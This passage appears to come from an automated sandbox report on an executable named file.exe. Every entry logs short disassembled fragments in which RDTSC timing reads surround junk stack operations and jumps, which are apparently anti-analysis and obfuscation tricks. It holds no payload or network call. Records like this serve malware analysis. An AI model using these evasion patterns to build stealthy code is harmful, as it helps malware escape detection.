                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196CCF second address: 1196CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196E67 second address: 1196E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196E6B second address: 1196E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADD66422Fh 0x00000007 jmp 00007F7ADD66422Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196E8D second address: 1196E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196E93 second address: 1196EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F7ADD664228h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1196EA5 second address: 1196EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7ADCEEDC9Bh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 jmp 00007F7ADCEEDC9Bh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11972C4 second address: 11972DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADD664237h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11972DF second address: 119730E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEEDCA0h 0x00000007 jmp 00007F7ADCEEDCA7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119730E second address: 1197314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119A4F6 second address: 119A4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119A4FC second address: 119A509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119A509 second address: 119A569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7ADCEEDCA5h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jng 00007F7ADCEEDCADh 0x00000015 jmp 00007F7ADCEEDCA7h 0x0000001a mov eax, dword ptr [eax] 0x0000001c jo 00007F7ADCEEDCA2h 0x00000022 jmp 00007F7ADCEEDC9Ch 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jc 00007F7ADCEEDC96h 0x00000034 push ecx 0x00000035 pop ecx 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119A569 second address: 119A56F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AC3F4 second address: 11AC3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AC3F8 second address: 11AC412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7ADD664232h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1190112 second address: 119011E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B89B4 second address: 11B89D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADD664239h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8C64 second address: 11B8C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 jnl 00007F7ADCEEDC96h 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8E15 second address: 11B8E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8E19 second address: 11B8E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8FBC second address: 11B8FC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8FC0 second address: 11B8FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8FC6 second address: 11B8FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9100 second address: 11B910C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B926B second address: 11B929A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 jg 00007F7ADD66422Ah 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F7ADD664235h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B929A second address: 11B92B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADCEEDCA5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B92B5 second address: 11B92D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7ADD664226h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F7ADD664226h 0x00000014 jmp 00007F7ADD66422Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B956C second address: 11B9570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9570 second address: 11B957D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7ADD664226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B957D second address: 11B9585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9585 second address: 11B958A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B9F67 second address: 11B9F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA0BB second address: 11BA0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA0C0 second address: 11BA0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA0C8 second address: 11BA0CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA3D3 second address: 11BA3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F7ADCEEDC96h 0x0000000d jmp 00007F7ADCEEDCA5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF7F2 second address: 11BF7F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF7F8 second address: 11BF806 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF806 second address: 11BF80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFE51 second address: 11BFE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFE57 second address: 11BFE5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFE5B second address: 11BFE78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7ADCEEDCA0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE792 second address: 11BE798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D30 second address: 11C1D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D36 second address: 11C1D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D3A second address: 11C1D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D3E second address: 11C1D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F7ADD664235h 0x00000010 push edx 0x00000011 jmp 00007F7ADD66422Ch 0x00000016 js 00007F7ADD664226h 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D78 second address: 11C1D7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C1D7C second address: 11C1D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C48A3 second address: 11C48B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C48B2 second address: 11C48C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADD66422Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C48C7 second address: 11C48CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C48CF second address: 11C48D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4A39 second address: 11C4A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4B8F second address: 11C4B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4B93 second address: 11C4BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7ADCEEDC9Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4BA8 second address: 11C4BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4BAC second address: 11C4BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4D58 second address: 11C4D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7ADD66422Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C4D68 second address: 11C4D7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7ADCEEDC9Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C503F second address: 11C505E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F7ADD664233h 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8BA9 second address: 11C8BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7ADCEEDC96h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8BB4 second address: 11C8BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8BBA second address: 11C8BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C94E3 second address: 11C951C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a je 00007F7ADD66422Ch 0x00000010 pop ecx 0x00000011 xchg eax, ebx 0x00000012 mov dword ptr [ebp+122D2FD8h], edi 0x00000018 nop 0x00000019 jmp 00007F7ADD664235h 0x0000001e push eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C95FF second address: 11C9616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCEEDC9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9616 second address: 11C9633 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADD664239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9633 second address: 11C9639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9639 second address: 11C963D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C963D second address: 11C9641 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C96E7 second address: 11C96ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9FA5 second address: 11C9FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9FA9 second address: 11C9FAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CA960 second address: 11CA978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADCEEDCA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB3FA second address: 11CB400 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBCD7 second address: 11CBCDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB400 second address: 11CB40A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7ADD664226h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB40A second address: 11CB40E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CCFA4 second address: 11CCFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDCF8 second address: 11CDCFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CA3 second address: 11D2CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F7ADCC94D48h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7ADCC94D51h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2CC6 second address: 11D2CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4441 second address: 11D4447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D356F second address: 11D3579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4447 second address: 11D44DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F7ADCC94D48h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Bh 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add dword ptr [ebp+1246DFA2h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F7ADCC94D48h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007F7ADCC94D48h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 call 00007F7ADCC94D4Ah 0x00000066 mov bl, 00h 0x00000068 pop edi 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F7ADCC94D50h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3579 second address: 11D357D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D5592 second address: 11D5596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D46E4 second address: 11D46E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D46E8 second address: 11D46EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D755F second address: 11D7565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7565 second address: 11D7569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D75FF second address: 11D7604 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D7604 second address: 11D7611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D8559 second address: 11D85B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F7ADCB94CD3h 0x0000000f jmp 00007F7ADCB94CCDh 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F7ADCB94CC8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xor dword ptr [ebp+122D1E49h], edi 0x00000035 push 00000000h 0x00000037 jng 00007F7ADCB94CCCh 0x0000003d mov ebx, dword ptr [ebp+122D2C55h] 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b pop edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D9575 second address: 11D9590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7ADCC94D57h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DF812 second address: 11DF82B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7ADCB94CD3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
